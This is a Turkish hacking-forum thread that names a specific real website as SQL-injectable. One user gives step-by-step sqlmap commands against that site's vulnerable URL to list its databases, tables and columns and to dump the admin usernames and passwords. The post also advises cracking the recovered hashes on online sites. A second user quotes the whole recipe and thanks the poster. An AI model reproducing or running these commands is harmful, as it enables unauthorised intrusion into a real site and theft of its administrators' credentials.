1x SQL Açıklı Site

Ertugrul'

Basın&Medya Ekibi Deneyimli
22 Mar 2023
1,210
991
Photoshop 🔥
Bu açığı nasıl kullanırız? sqlmap ile mi?
Komutları basit bir şekilde açıklıyayım.
Terminale girip;

1. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" --dbs
Yazarsanız siteyi tarar ve en altta size bulunan database lerş verir.

2. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) --tables
Bu kod sütununda ise senin vermiş olduğun databasei taratır ve içindeki tabloları sıralar. Ben bu siteyi test için taratmıştım tabloların en üstünde admin tablosu yer alıyor zaten.

3. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) --columns
Bu kodu yazdıktan sonra ise admin tablosundaki colonları taratır. Bu siteyi tarattığın zaman çıkıcak sonu şunlar;
İD
UserName
Password
Son olarak bilgileri dump etmek kaldı.

4. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump
Bu kodu yazdıktan sonra ise sana admin bilgilerini dump edicektir. Bazen MD5 SH1 gibi şifreler çıkıyor onlarıda chrome üzerinde hashes sitelerden çözebilirsin.

SqlMap sadece bu kadar değil daha birkaç ayrıntı daha var ben sadece kısaca temel kodları anlattım bu kodlar ile admin bilgilerine erişebilirsin.

Not: Önüne bazen Y/N soruları çıkıcak onların hepsine Y diyip geçebilirsin.
 

hidrhyme

Yeni üye
25 May 2024
35
9
Komutları basit bir şekilde açıklıyayım.
Terminale girip;

1. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" --dbs
Yazarsanız siteyi tarar ve en altta size bulunan database lerş verir.

2. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) --tables
Bu kod sütununda ise senin vermiş olduğun databasei taratır ve içindeki tabloları sıralar. Ben bu siteyi test için taratmıştım tabloların en üstünde admin tablosu yer alıyor zaten.

3. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) --columns
Bu kodu yazdıktan sonra ise admin tablosundaki colonları taratır. Bu siteyi tarattığın zaman çıkıcak sonu şunlar;
İD
UserName
Password
Son olarak bilgileri dump etmek kaldı.

4. Kod:
Kod:
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump
Bu kodu yazdıktan sonra ise sana admin bilgilerini dump edicektir. Bazen MD5 SH1 gibi şifreler çıkıyor onlarıda chrome üzerinde hashes sitelerden çözebilirsin.

SqlMap sadece bu kadar değil daha birkaç ayrıntı daha var ben sadece kısaca temel kodları anlattım bu kodlar ile admin bilgilerine erişebilirsin.

Not: Önüne bazen Y/N soruları çıkıcak onların hepsine Y diyip geçebilirsin.
Sağol kral cansın
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.